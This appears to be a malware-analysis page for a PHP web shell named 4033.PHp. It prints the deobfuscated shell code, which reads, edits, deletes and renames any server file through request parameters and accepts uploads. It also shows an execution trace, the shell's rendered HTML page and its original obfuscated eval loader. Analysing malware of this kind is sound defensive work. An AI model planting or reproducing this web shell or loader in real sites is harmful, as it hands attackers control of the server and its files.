"\r\n\t\t\t\t\t<script>alert(\'diupload!!!\');</script>\r\n\t\t\t\t\t";\r\n\t\t\t\t\t\t\r\n\r\n\t\r\n\t}\r\n\t?>\r\n\r\n\t<form method="post" enctype="multipart/form-data">\r\n\t\t<input type="file" name="upload">\r\n\t\t<input type="submit" name="submit" value="Upload">\r\n\t\t\r\n\t</form>\r\n\r\n  </div>\r\n<table>\r\n\t<tr>\r\n\t\t<th>Nama File / Folder</th>\r\n\t\t<th>Size</th>\r\n\t\t<th>Action</th>\r\n\t</tr>\r\n\t<?php\r\n\t$scan = scandir($dir);\r\n\r\nforeach ($scan as $directory) {\r\n\tif (!is_dir($dir.\'/\'.$directory) || $directory == \'.\' || $directory == \'..\') continue;\r\n\r\n\techo \'\r\n\t<tr>\r\n\t<td><a href="?dir=\'.$dir.\'/\'.$directory.\'">\'.$directory.\'</a></td>\r\n\t<td>--</td>\r\n\t<td>NONE</td>\r\n\t</tr>\r\n\t\';\r\n\t} \r\nforeach ($scan as $file) {\r\n\tif (!is_file($dir.\'/\'.$file)) continue;\r\n\r\n\t$jumlah = filesize($dir.\'/\'.$file)/1024;\r\n\t$jumlah = round($jumlah, 3);\r\n\tif ($jumlah >= 1024) {\r\n\t\t$jumlah = round($jumlah/1024, 2).\'MB\';\r\n\t} else {\r\n\t\t$jumlah = $jumlah .\'KB\';\r\n\t}\r\n\r\n\techo \'\r\n\t<tr>\r\n\t<td><a href="?dir=\'.$dir.\'&open=\'.$dir.\'/\'.$file.\'">\'.$file.\'</a></td>\r\n\t<td>\'.$jumlah.\'</td>\r\n\t<td>\r\n\t<a href="?dir=\'.$dir.\'&delete=\'.$dir.\'/\'.$file.\'" class="button1">Hapus</a>\r\n\t<a href="?dir=\'.$dir.\'&ubah=\'.$dir.\'/\'.$file.\'" class="button1">Edit</a>\r\n\t<a href="?dir=\'.$dir.\'&rename=\'.$dir.\'/\'.$file.\'&nama=\'.$file.\'" class="button1">Rename</a>\r\n\t</td>\r\n\t</tr>\r\n\t\';\r\n}\r\nif (isset($_GET[\'open\'])) {\r\n\techo \'\r\n\t<br />\r\n\t<style>\r\n\t\ttable {\r\n\t\t\tdisplay: none;\r\n\t\t}\r\n\t</style>\r\n\t<textarea>\'.htmlspecialchars(file_get_contents($_GET[\'open\'])).\'</textarea>\r\n\t\';\r\n}\r\n\r\nif (isset($_GET[\'delete\'])) {\r\n\tif (unlink($_GET[\'delete\'])) {\r\n\t\techo "<script>alert(\'dihapus\');window.location=\'?dir=".$dir."\';</script>";\r\n\t}\r\n}\r\nif (isset($_GET[\'ubah\'])) {\r\n\techo \'\r\n\r\n\t\t<style>\r\n\t\t\ttable {\r\n\t\t\t\tdisplay: none;\r\n\t\t\t}\r\n\t\t</style>\r\n\r\n\t\t<a href="?dir=\'.$dir.\'" class="button1"><=Back</a>\r\n\t\t<form method="post" action="">\r\n\t\t<input type="hidden" name="object" value="\'.$_GET[\'ubah\'].\'">\r\n\t\t<textarea name="edit">\'.htmlspecialchars(file_get_contents($_GET[\'ubah\'])).\'</textarea>\r\n\t\t<center><button type="submit" name="go" value="Submit" class="button1">Liking</button></center>\r\n\t\t</form>\r\n\r\n\t\t\';\r\n}\r\nif (isset($_POST[\'edit\'])) {\r\n\t$data = fopen($_POST["object"], \'w\');\r\n\tif (fwrite($data, $_POST[\'edit\'])) {\r\n\r\n\t\techo \r\n\t\t\t\'\r\n\t\t\t<script>alert("Berhasil diedit!!!");window.location="?dir=\'.$dir.\'";</script>\t\t\t\t\t\t\r\n\t\t\t\';\r\n\r\n\t} else {\r\n\t\techo "\r\n\t\t\t<script>alert(\'gagal\');</script>\t\t\t\t\t\r\n\t\t\t";\r\n\t}\r\n}\r\n\r\nif($_GET[\'rename\']){\r\n\tif(isset($_POST[\'newname\'])){\r\n\t\tif(rename($_GET[\'rename\'], $_GET[\'dir\'] . \'/\' .$_POST[\'newname\'])){\r\n\t\t\techo \'<font color="green">Ganti Nama Berhasil</font><br/>\';\r\n\t\t\techo "<script>window.location=\'?dir=".$dir."\';</script>";\r\n\t\t}else{\r\n\t\t\techo \'<font color="red">Ganti Nama Gagal</font><br />\';\r\n\t\t}\r\n\t}\r\necho \'<br><center><form method="POST">\r\nNew Name : <input name="newname" type="text" size="20" value="\'.$_GET[\'nama\'].\'" />\r\n<input type="hidden" name="path" value="\'.$_GET[\'dir\'].\'">\r\n<input type="hidden" name="opt" value="rename">\r\n<input type="submit" value="Go" />\r\n</form></center>\';\r\n}\r\n\r\n?>\r\n</table>\r\n</body>\r\n</html>'	/var/www/html/uploads/4033.PHp(7) : eval()'d code	1	0
4	14	0	0.001813	432856	getcwd	0		/var/www/html/uploads/4033.PHp(7) : eval()'d code(1) : eval()'d code	127	0
4	14	1	0.001836	432904
4	14	R			'/var/www/html/uploads'
3		A						/var/www/html/uploads/4033.PHp(7) : eval()'d code(1) : eval()'d code	127	$dir = '/var/www/html/uploads'
4	15	0	0.001875	432904	str_replace	0		/var/www/html/uploads/4033.PHp(7) : eval()'d code(1) : eval()'d code	130	3	'\\'	'/'	'/var/www/html/uploads'
4	15	1	0.001896	433000
4	15	R			'/var/www/html/uploads'
3		A						/var/www/html/uploads/4033.PHp(7) : eval()'d code(1) : eval()'d code	130	$dir = '/var/www/html/uploads'
4	16	0	0.001931	432904	explode	0		/var/www/html/uploads/4033.PHp(7) : eval()'d code(1) : eval()'d code	131	2	'/'	'/var/www/html/uploads'
4	16	1	0.001951	433480
4	16	R			[0 => '', 1 => 'var', 2 => 'www', 3 => 'html', 4 => 'uploads']
3		A						/var/www/html/uploads/4033.PHp(7) : eval()'d code(1) : eval()'d code	131	$dirs = [0 => '', 1 => 'var', 2 => 'www', 3 => 'html', 4 => 'uploads']
3		A						/var/www/html/uploads/4033.PHp(7) : eval()'d code(1) : eval()'d code	133	$key = 0
3		A						/var/www/html/uploads/4033.PHp(7) : eval()'d code(1) : eval()'d code	133	$key = 1
3		A						/var/www/html/uploads/4033.PHp(7) : eval()'d code(1) : eval()'d code	138	$i = 0
3		A						/var/www/html/uploads/4033.PHp(7) : eval()'d code(1) : eval()'d code	138	$i++
3		A						/var/www/html/uploads/4033.PHp(7) : eval()'d code(1) : eval()'d code	138	$i++
3		A						/var/www/html/uploads/4033.PHp(7) : eval()'d code(1) : eval()'d code	133	$key = 2
3		A						/var/www/html/uploads/4033.PHp(7) : eval()'d code(1) : eval()'d code	138	$i = 0
3		A						/var/www/html/uploads/4033.PHp(7) : eval()'d code(1) : eval()'d code	138	$i++
3		A						/var/www/html/uploads/4033.PHp(7) : eval()'d code(1) : eval()'d code	138	$i++
3		A						/var/www/html/uploads/4033.PHp(7) : eval()'d code(1) : eval()'d code	138	$i++
3		A						/var/www/html/uploads/4033.PHp(7) : eval()'d code(1) : eval()'d code	133	$key = 3
3		A						/var/www/html/uploads/4033.PHp(7) : eval()'d code(1) : eval()'d code	138	$i = 0
3		A						/var/www/html/uploads/4033.PHp(7) : eval()'d code(1) : eval()'d code	138	$i++
3		A						/var/www/html/uploads/4033.PHp(7) : eval()'d code(1) : eval()'d code	138	$i++
3		A						/var/www/html/uploads/4033.PHp(7) : eval()'d code(1) : eval()'d code	138	$i++
3		A						/var/www/html/uploads/4033.PHp(7) : eval()'d code(1) : eval()'d code	138	$i++
3		A						/var/www/html/uploads/4033.PHp(7) : eval()'d code(1) : eval()'d code	133	$key = 4
3		A						/var/www/html/uploads/4033.PHp(7) : eval()'d code(1) : eval()'d code	138	$i = 0
3		A						/var/www/html/uploads/4033.PHp(7) : eval()'d code(1) : eval()'d code	138	$i++
3		A						/var/www/html/uploads/4033.PHp(7) : eval()'d code(1) : eval()'d code	138	$i++
3		A						/var/www/html/uploads/4033.PHp(7) : eval()'d code(1) : eval()'d code	138	$i++
3		A						/var/www/html/uploads/4033.PHp(7) : eval()'d code(1) : eval()'d code	138	$i++
3		A						/var/www/html/uploads/4033.PHp(7) : eval()'d code(1) : eval()'d code	138	$i++
4	17	0	0.002291	433408	scandir	0		/var/www/html/uploads/4033.PHp(7) : eval()'d code(1) : eval()'d code	174	1	'/var/www/html/uploads'
4	17	1	0.002336	434032
4	17	R			[0 => '.', 1 => '..', 2 => '.htaccess', 3 => '4033.PHp', 4 => 'data', 5 => 'prepend.php']
3		A						/var/www/html/uploads/4033.PHp(7) : eval()'d code(1) : eval()'d code	174	$scan = [0 => '.', 1 => '..', 2 => '.htaccess', 3 => '4033.PHp', 4 => 'data', 5 => 'prepend.php']
4	18	0	0.002389	434048	is_dir	0		/var/www/html/uploads/4033.PHp(7) : eval()'d code(1) : eval()'d code	177	1	'/var/www/html/uploads/.'
4	18	1	0.002417	434112
4	18	R			TRUE
4	19	0	0.002436	434080	is_dir	0		/var/www/html/uploads/4033.PHp(7) : eval()'d code(1) : eval()'d code	177	1	'/var/www/html/uploads/..'
4	19	1	0.002457	434128
4	19	R			TRUE
4	20	0	0.002475	434088	is_dir	0		/var/www/html/uploads/4033.PHp(7) : eval()'d code(1) : eval()'d code	177	1	'/var/www/html/uploads/.htaccess'
4	20	1	0.002495	434128
4	20	R			FALSE
4	21	0	0.002513	434088	is_dir	0		/var/www/html/uploads/4033.PHp(7) : eval()'d code(1) : eval()'d code	177	1	'/var/www/html/uploads/4033.PHp'
4	21	1	0.002532	434128
4	21	R			FALSE
4	22	0	0.002550	434088	is_dir	0		/var/www/html/uploads/4033.PHp(7) : eval()'d code(1) : eval()'d code	177	1	'/var/www/html/uploads/data'
4	22	1	0.002570	434128
4	22	R			TRUE
4	23	0	0.002588	434096	is_dir	0		/var/www/html/uploads/4033.PHp(7) : eval()'d code(1) : eval()'d code	177	1	'/var/www/html/uploads/prepend.php'
4	23	1	0.002610	434144
4	23	R			FALSE
4	24	0	0.002628	434088	is_file	0		/var/www/html/uploads/4033.PHp(7) : eval()'d code(1) : eval()'d code	188	1	'/var/www/html/uploads/.'
4	24	1	0.002648	434112
4	24	R			FALSE
4	25	0	0.002666	434080	is_file	0		/var/www/html/uploads/4033.PHp(7) : eval()'d code(1) : eval()'d code	188	1	'/var/www/html/uploads/..'
4	25	1	0.002686	434128
4	25	R			FALSE
4	26	0	0.002703	434088	is_file	0		/var/www/html/uploads/4033.PHp(7) : eval()'d code(1) : eval()'d code	188	1	'/var/www/html/uploads/.htaccess'
4	26	1	0.002724	434128
4	26	R			TRUE
4	27	0	0.002741	434088	filesize	0		/var/www/html/uploads/4033.PHp(7) : eval()'d code(1) : eval()'d code	190	1	'/var/www/html/uploads/.htaccess'
4	27	1	0.002760	434128
4	27	R			64
3		A						/var/www/html/uploads/4033.PHp(7) : eval()'d code(1) : eval()'d code	190	$jumlah = 0.0625
4	28	0	0.002794	434032	round	0		/var/www/html/uploads/4033.PHp(7) : eval()'d code(1) : eval()'d code	191	2	0.0625	3
4	28	1	0.002813	434104
4	28	R			0.063
3		A						/var/www/html/uploads/4033.PHp(7) : eval()'d code(1) : eval()'d code	191	$jumlah = 0.063
3		A						/var/www/html/uploads/4033.PHp(7) : eval()'d code(1) : eval()'d code	195	$jumlah = '0.063KB'
4	29	0	0.002866	434120	is_file	0		/var/www/html/uploads/4033.PHp(7) : eval()'d code(1) : eval()'d code	188	1	'/var/www/html/uploads/4033.PHp'
4	29	1	0.002886	434160
4	29	R			TRUE
4	30	0	0.002903	434120	filesize	0		/var/www/html/uploads/4033.PHp(7) : eval()'d code(1) : eval()'d code	190	1	'/var/www/html/uploads/4033.PHp'
4	30	1	0.002920	434160
4	30	R			3072
3		A						/var/www/html/uploads/4033.PHp(7) : eval()'d code(1) : eval()'d code	190	$jumlah = 3
4	31	0	0.002952	434032	round	0		/var/www/html/uploads/4033.PHp(7) : eval()'d code(1) : eval()'d code	191	2	3	3
4	31	1	0.002971	434104
4	31	R			3
3		A						/var/www/html/uploads/4033.PHp(7) : eval()'d code(1) : eval()'d code	191	$jumlah = 3
3		A						/var/www/html/uploads/4033.PHp(7) : eval()'d code(1) : eval()'d code	195	$jumlah = '3KB'
4	32	0	0.003021	434120	is_file	0		/var/www/html/uploads/4033.PHp(7) : eval()'d code(1) : eval()'d code	188	1	'/var/www/html/uploads/data'
4	32	1	0.003042	434160
4	32	R			FALSE
4	33	0	0.003059	434128	is_file	0		/var/www/html/uploads/4033.PHp(7) : eval()'d code(1) : eval()'d code	188	1	'/var/www/html/uploads/prepend.php'
4	33	1	0.003081	434176
4	33	R			TRUE
4	34	0	0.003098	434136	filesize	0		/var/www/html/uploads/4033.PHp(7) : eval()'d code(1) : eval()'d code	190	1	'/var/www/html/uploads/prepend.php'
4	34	1	0.003117	434176
4	34	R			57
3		A						/var/www/html/uploads/4033.PHp(7) : eval()'d code(1) : eval()'d code	190	$jumlah = 0.0556640625
4	35	0	0.003149	434040	round	0		/var/www/html/uploads/4033.PHp(7) : eval()'d code(1) : eval()'d code	191	2	0.0556640625	3
4	35	1	0.003168	434112
4	35	R			0.056
3		A						/var/www/html/uploads/4033.PHp(7) : eval()'d code(1) : eval()'d code	191	$jumlah = 0.056
3		A						/var/www/html/uploads/4033.PHp(7) : eval()'d code(1) : eval()'d code	195	$jumlah = '0.056KB'
3	13	1	0.003249	434184
2	7	1	0.003263	409792
			0.003294	328536
TRACE END   [2023-02-13 01:51:01.309957]

Generated HTML code
<html><head>
	<title>Shell Bypass 403 GE-C666C</title>
	<link href="https://fonts.googleapis.com/css2?family=Courgette&amp;family=Cuprum:ital@1&amp;family=Rowdies&amp;display=swap" rel="stylesheet"> 
<style>
	* {
		font-family: cursive;
		color: #000;
		font-family: 'Cuprum', sans-serif;
	}

	body {
		background-repeat: no-repeat;
		background-attachment:fixed;
		background-size: 100% 1700px;
	}
	body h1{
		color: #A52A2A;
		text-shadow: 2px 2px 2px #000;
		font-size: 50px;
	}
	.dir {
		text-align: center;
		font-size: 30px;
	}
	.dir a{
		text-decoration: none;
		color: #48D1CC;
		text-shadow: 1px 1px 1px #000;

	}
	.dir a:hover{
		text-decoration: none;
		color: red;
	}
	table {
		margin: 12px auto;
		height: 100%;
		border-collapse: collapse;
		font-size: 30px;
	}
	table,th {
		border-top:1px solid #000;
		border-right:3px solid #000;
		border-bottom: 3px solid #000;
		border-left:1px solid #000;
		box-sizing: border-box;
		padding: 2px 2px;
		color: #F0E68C;
		text-shadow: 1px 1px 1px #000;
	}
	table,td {
		border-top:1px solid #000;
		border-right:3px solid #000;
		border-bottom: .5px solid #000;
		border-left:1px solid #000;
		box-sizing: border-box;
		padding: 8px 8px;
		color: red;
	}
	table,td a {
		text-decoration: none;
		color:#8A2BE2;
		text-shadow: 1px 1px 1px #000;
	}
	table,td a:hover {
		text-decoration: none;
		color: red;
	}
	.button1 {
		width: 70px;
		height: 30px;
		background-color: #999;
		margin: 10px 3px;
		padding: 5px;
		color: #000;
		border-radius: 5px;
		border: 1px solid #000;
		box-shadow: .5px .5px .3px .3px #fff;
		box-sizing: border-box;
	}
	.button1 a{
		width: 70px;
		height: 30px;
		background-color: #999;
		margin: 10px 3px;
		padding: 5px;
		color: red;
		border-radius: 5px;
		border: 1px solid #000;
		box-shadow: .5px .5px .3px .3px #fff;
		box-sizing: border-box;
	}
	.button1:hover {
		text-shadow: 0px 0px 5px #fff;
		box-shadow: .5px .5px .3px .3px #555;
		text-decoration: none;
	}
	textarea {
		border: 1px solid green;
		border-radius: 5px;
		box-shadow: 1px 1px 1px 1px #fff;
		width: 100%;
		height: 400px;
		padding-left: 10px;
		margin: 10px auto;
		resize: none;
		background: green;
		color: #ffffff;
		font-family: 'Cuprum', sans-serif;
		font-size: 13px;
	}
</style></head>

<body>
	<center><h1>Ghost Exploiter Team Official</h1></center>
  <div class="dir">
	<a href="/">/</a><a href="?dir=/var">var</a>/<a href="?dir=/var/www">www</a>/<a href="?dir=/var/www/html">html</a>/
	<form method="post" enctype="multipart/form-data">
		<input type="file" name="upload">
		<input type="submit" name="submit" value="Upload">
		
	</form>

  </div>
<table>
	<tbody><tr>
		<th>Nama File / Folder</th>
		<th>Size</th>
		<th>Action</th>
	</tr>
	
	<tr>
	<td><a href="?dir=/var/www/html&amp;open=/var/www/html/4033.PHp">4033.PHp</a></td>
	<td>3KB</td>
	<td>
	<a href="?dir=/var/www/html&amp;delete=/var/www/html/4033.PHp" class="button1">Hapus</a>
	<a href="?dir=/var/www/html&amp;ubah=/var/www/html/4033.PHp" class="button1">Edit</a>
	<a href="?dir=/var/www/html&amp;rename=/var/www/html/4033.PHp&amp;nama=4033.PHp" class="button1">Rename</a>
	</td>
	</tr>
	
	<tr>
	<td><a href="?dir=/var/www/html&amp;open=/var/www/html/beneri.se_malware_analysis">beneri.se_malware_analysis</a></td>
	<td>0KB</td>
	<td>
	<a href="?dir=/var/www/html&amp;delete=/var/www/html/beneri.se_malware_analysis" class="button1">Hapus</a>
	<a href="?dir=/var/www/html&amp;ubah=/var/www/html/beneri.se_malware_analysis" class="button1">Edit</a>
	<a href="?dir=/var/www/html&amp;rename=/var/www/html/beneri.se_malware_analysis&amp;nama=beneri.se_malware_analysis" class="button1">Rename</a>
	</td>
	</tr>
	</tbody></table>

</body></html>
Original PHP code
<?php

//Encrypted at : http://ghostexploiter.ga/tools/obfusfactor

$code = "a5xYLVjM0UO3t0bXWK8qzVjOzy0oVy0u1lWvysxYy1YsVlJvJSUWp5qZxKekJuenpHcUlxQVpZZ2qKR05BeXdYKBNQBWWRsy";$ghost = "=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";

eval(gzuncompress(str_rot13(base64_decode($code))));
exit;
?>
PHP Malware Analysis

4033.PHp

md5: 5426e684d550af16ff977d1c41781bfe

Screenshot

Attributes

Deobfuscated PHP code

Execution traces

Generated HTML code

Original PHP code
